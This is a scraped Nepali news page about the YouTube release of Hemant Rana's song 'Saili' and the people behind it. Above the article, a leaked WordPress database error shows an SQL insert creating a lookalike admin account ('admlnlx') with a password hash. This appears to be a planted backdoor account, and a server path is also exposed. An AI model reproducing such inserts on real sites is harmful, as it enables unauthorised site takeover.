WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfK2E6N0uz72JlzhW3vIMNnUN3wFEn/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:47:07', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
हेमन्त रानाको ‘साइली’ बजारमा (भिडियोसहित) – Gaule Khabar

हेमन्त रानाको ‘साइली’ बजारमा (भिडियोसहित)

हेमन्त रानाको ‘साइली’ बजारमा (भिडियोसहित)

चितवन,माघ २९-

हेमन्त रानाको गीत ‘साइली’ सार्वजनिक भएको छ । शुक्रबार युट्युब मार्फत सार्वजनिक गरिएको गीतमा शब्द कालीप्रसाद बास्कोटा र हिमाल साउदको रहेको छ भने संगीत पनि कालीप्रसादकै छ ।

रिकेश गुरुङले एरेज्ज गरेको गीतको भिडियोमा गौरव पहाडी र मेनुका प्रधानले अभिन गरेका छन् । उज्वल जोशीले भिडियो खिचेका हुन् भने निर्देशन हेमन्त राना स्वमको छ ।

भिडियो दुवई र काठमाडौंमा छायांकन गरिएको छ । गीतमा वैदेशिक रोजगारीले नवविवाहिता जोडीको विछोडको पीडालाई मार्मिक रुपमा देखाइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका